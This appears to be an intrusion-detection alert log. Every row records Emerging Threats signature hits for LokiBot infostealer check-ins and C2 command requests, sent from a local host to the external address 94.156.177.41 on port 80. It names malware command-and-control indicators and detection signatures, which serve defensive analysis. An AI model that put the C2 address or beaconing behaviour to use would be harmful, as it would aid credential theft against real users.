2025-01-10T23:39:43.700209+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-10T23:39:44.408571+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-10T23:39:44.408571+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-10T23:39:44.571656+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49881	94.156.177.41	80	TCP
2025-01-10T23:39:44.571656+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49881	94.156.177.41	80	TCP
2025-01-10T23:39:44.571656+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49881	94.156.177.41	80	TCP
2025-01-10T23:39:45.290090+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49881	94.156.177.41	80	TCP
2025-01-10T23:39:45.290090+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49881	94.156.177.41	80	TCP
2025-01-10T23:39:45.467959+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49886	94.156.177.41	80	TCP
2025-01-10T23:39:45.467959+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49886	94.156.177.41	80	TCP
2025-01-10T23:39:45.467959+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49886	94.156.177.41	80	TCP
2025-01-10T23:39:46.179028+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49886	94.156.177.41	80	TCP
2025-01-10T23:39:46.179028+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49886	94.156.177.41	80	TCP
2025-01-10T23:39:46.347914+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49892	94.156.177.41	80	TCP
2025-01-10T23:39:46.347914+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49892	94.156.177.41	80	TCP
2025-01-10T23:39:46.347914+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49892	94.156.177.41	80	TCP
2025-01-10T23:39:47.050321+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49892	94.156.177.41	80	TCP
2025-01-10T23:39:47.050321+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49892	94.156.177.41	80	TCP
2025-01-10T23:39:47.224865+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49901	94.156.177.41	80	TCP
2025-01-10T23:39:47.224865+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49901	94.156.177.41	80	TCP
2025-01-10T23:39:47.224865+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49901	94.156.177.41	80	TCP
2025-01-10T23:39:47.937644+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49901	94.156.177.41	80	TCP
2025-01-10T23:39:47.937644+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49901	94.156.177.41	80	TCP
2025-01-10T23:39:48.085557+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49908	94.156.177.41	80	TCP
2025-01-10T23:39:48.085557+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49908	94.156.177.41	80	TCP
2025-01-10T23:39:48.085557+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49908	94.156.177.41	80	TCP
2025-01-10T23:39:48.806843+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49908	94.156.177.41	80	TCP
2025-01-10T23:39:48.806843+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49908	94.156.177.41	80	TCP
2025-01-10T23:39:48.966901+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49914	94.156.177.41	80	TCP
2025-01-10T23:39:48.966901+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49914	94.156.177.41	80	TCP
2025-01-10T23:39:48.966901+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49914	94.156.177.41	80	TCP
2025-01-10T23:39:49.665813+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49914	94.156.177.41	80	TCP
2025-01-10T23:39:49.665813+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49914	94.156.177.41	80	TCP
2025-01-10T23:39:49.857189+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49920	94.156.177.41	80	TCP
2025-01-10T23:39:49.857189+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49920	94.156.177.41	80	TCP
2025-01-10T23:39:49.857189+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49920	94.156.177.41	80	TCP
2025-01-10T23:39:50.575157+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49920	94.156.177.41	80	TCP
2025-01-10T23:39:50.575157+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49920	94.156.177.41	80	TCP
2025-01-10T23:39:50.736564+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49926	94.156.177.41	80	TCP
2025-01-10T23:39:50.736564+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49926	94.156.177.41	80	TCP
2025-01-10T23:39:50.736564+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49926	94.156.177.41	80	TCP
2025-01-10T23:39:51.444692+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49926	94.156.177.41	80	TCP
2025-01-10T23:39:51.444692+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49926	94.156.177.41	80	TCP
2025-01-10T23:39:51.608218+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49933	94.156.177.41	80	TCP
2025-01-10T23:39:51.608218+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49933	94.156.177.41	80	TCP
2025-01-10T23:39:51.608218+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49933	94.156.177.41	80	TCP
2025-01-10T23:39:52.338312+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49933	94.156.177.41	80	TCP
2025-01-10T23:39:52.338312+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49933	94.156.177.41	80	TCP
2025-01-10T23:39:52.498581+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49940	94.156.177.41	80	TCP
2025-01-10T23:39:52.498581+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49940	94.156.177.41	80	TCP
2025-01-10T23:39:52.498581+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49940	94.156.177.41	80	TCP
2025-01-10T23:39:53.218160+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49940	94.156.177.41	80	TCP
2025-01-10T23:39:53.218160+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49940	94.156.177.41	80	TCP
2025-01-10T23:39:53.373246+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49948	94.156.177.41	80	TCP
2025-01-10T23:39:53.373246+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49948	94.156.177.41	80	TCP
2025-01-10T23:39:53.373246+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49948	94.156.177.41	80	TCP
2025-01-10T23:39:54.086668+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49948	94.156.177.41	80	TCP
2025-01-10T23:39:54.086668+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49948	94.156.177.41	80	TCP
2025-01-10T23:39:54.280518+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49954	94.156.177.41	80	TCP
2025-01-10T23:39:54.280518+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49954	94.156.177.41	80	TCP
2025-01-10T23:39:54.280518+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49954	94.156.177.41	80	TCP
2025-01-10T23:39:55.025052+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49954	94.156.177.41	80	TCP
2025-01-10T23:39:55.025052+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49954	94.156.177.41	80	TCP
2025-01-10T23:39:55.188309+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49960	94.156.177.41	80	TCP
2025-01-10T23:39:55.188309+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49960	94.156.177.41	80	TCP
2025-01-10T23:39:55.188309+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49960	94.156.177.41	80	TCP
2025-01-10T23:39:55.955134+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49960	94.156.177.41	80	TCP
2025-01-10T23:39:55.955134+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49960	94.156.177.41	80	TCP
2025-01-10T23:39:56.120922+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49967	94.156.177.41	80	TCP
2025-01-10T23:39:56.120922+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49967	94.156.177.41	80	TCP
2025-01-10T23:39:56.120922+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49967	94.156.177.41	80	TCP
2025-01-10T23:39:56.995565+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49967	94.156.177.41	80	TCP
2025-01-10T23:39:56.995565+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49967	94.156.177.41	80	TCP
2025-01-10T23:39:57.148898+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49975	94.156.177.41	80	TCP
2025-01-10T23:39:57.148898+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49975	94.156.177.41	80	TCP
2025-01-10T23:39:57.148898+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49975	94.156.177.41	80	TCP
2025-01-10T23:39:57.897849+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49975	94.156.177.41	80	TCP
2025-01-10T23:39:57.897849+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49975	94.156.177.41	80	TCP
2025-01-10T23:39:58.061788+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49981	94.156.177.41	80	TCP
2025-01-10T23:39:58.061788+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49981	94.156.177.41	80	TCP
2025-01-10T23:39:58.061788+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49981	94.156.177.41	80	TCP
2025-01-10T23:39:58.785828+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49981	94.156.177.41	80	TCP
2025-01-10T23:39:58.785828+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49981	94.156.177.41	80	TCP
2025-01-10T23:39:58.942881+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49988	94.156.177.41	80	TCP
2025-01-10T23:39:58.942881+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49988	94.156.177.41	80	TCP
2025-01-10T23:39:58.942881+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49988	94.156.177.41	80	TCP
2025-01-10T23:39:59.648286+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49988	94.156.177.41	80	TCP
2025-01-10T23:39:59.648286+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49988	94.156.177.41	80	TCP
2025-01-10T23:39:59.805268+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-10T23:39:59.805268+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-10T23:39:59.805268+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-10T23:40:00.553250+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-10T23:40:00.553250+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-10T23:40:00.712172+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49998	94.156.177.41	80	TCP
2025-01-10T23:40:00.712172+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49998	94.156.177.41	80	TCP
2025-01-10T23:40:00.712172+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49998	94.156.177.41	80	TCP
2025-01-10T23:40:01.422154+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49998	94.156.177.41	80	TCP
2025-01-10T23:40:01.422154+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	49998	94.156.177.41	80	TCP
2025-01-10T23:40:01.567820+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50004	94.156.177.41	80	TCP
2025-01-10T23:40:01.567820+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50004	94.156.177.41	80	TCP
2025-01-10T23:40:01.567820+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50004	94.156.177.41	80	TCP
2025-01-10T23:40:02.303573+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50004	94.156.177.41	80	TCP
2025-01-10T23:40:02.303573+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50004	94.156.177.41	80	TCP
2025-01-10T23:40:02.475547+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-10T23:40:02.475547+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-10T23:40:02.475547+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-10T23:40:03.179106+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-10T23:40:03.179106+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-10T23:40:03.338597+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-10T23:40:03.338597+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-10T23:40:03.338597+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-10T23:40:04.057722+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-10T23:40:04.057722+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-10T23:40:04.219923+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-10T23:40:04.219923+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-10T23:40:04.219923+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-10T23:40:04.934937+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-10T23:40:04.934937+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-10T23:40:05.091256+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-10T23:40:05.091256+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-10T23:40:05.091256+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-10T23:40:05.820286+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-10T23:40:05.820286+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-10T23:40:05.975511+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-10T23:40:05.975511+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-10T23:40:05.975511+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-10T23:40:06.677767+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-10T23:40:06.677767+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-10T23:40:06.861436+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-10T23:40:06.861436+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-10T23:40:06.861436+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-10T23:40:07.584598+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-10T23:40:07.584598+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-10T23:40:07.743342+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-10T23:40:07.743342+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-10T23:40:07.743342+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-10T23:40:08.487826+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-10T23:40:08.487826+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-10T23:40:08.645278+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-10T23:40:08.645278+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-10T23:40:08.645278+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-10T23:40:09.332798+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-10T23:40:09.332798+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-10T23:40:09.491507+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-10T23:40:09.491507+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-10T23:40:09.491507+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-10T23:40:10.187709+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-10T23:40:10.187709+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-10T23:40:10.336713+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-10T23:40:10.336713+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-10T23:40:10.336713+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-10T23:40:11.084858+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-10T23:40:11.084858+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-10T23:40:11.244942+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-10T23:40:11.244942+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-10T23:40:11.244942+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-10T23:40:11.967895+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-10T23:40:11.967895+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-10T23:40:12.114270+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50026	94.156.177.41	80	TCP
2025-01-10T23:40:12.114270+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50026	94.156.177.41	80	TCP
2025-01-10T23:40:12.114270+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50026	94.156.177.41	80	TCP
2025-01-10T23:40:12.828046+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50026	94.156.177.41	80	TCP
2025-01-10T23:40:12.828046+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50026	94.156.177.41	80	TCP
2025-01-10T23:40:12.999101+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-10T23:40:12.999101+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-10T23:40:12.999101+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-10T23:40:13.727441+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-10T23:40:13.727441+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-10T23:40:13.879820+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-10T23:40:13.879820+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-10T23:40:13.879820+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-10T23:40:14.585926+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-10T23:40:14.585926+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-10T23:40:14.751608+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-10T23:40:14.751608+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-10T23:40:14.751608+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-10T23:40:15.480507+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-10T23:40:15.480507+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-10T23:40:15.631391+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-10T23:40:15.631391+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-10T23:40:15.631391+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-10T23:40:16.344537+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-10T23:40:16.344537+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-10T23:40:16.495720+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-10T23:40:16.495720+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-10T23:40:16.495720+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-10T23:40:17.241026+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-10T23:40:17.241026+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-10T23:40:17.398131+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-10T23:40:17.398131+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-10T23:40:17.398131+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-10T23:40:18.254524+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-10T23:40:18.254524+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-10T23:40:18.418308+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-10T23:40:18.418308+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-10T23:40:18.418308+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-10T23:40:19.174821+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-10T23:40:19.174821+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-10T23:40:19.336242+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-10T23:40:19.336242+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-10T23:40:19.336242+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-10T23:40:20.066732+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50035	94.156.177.41	80	TCP
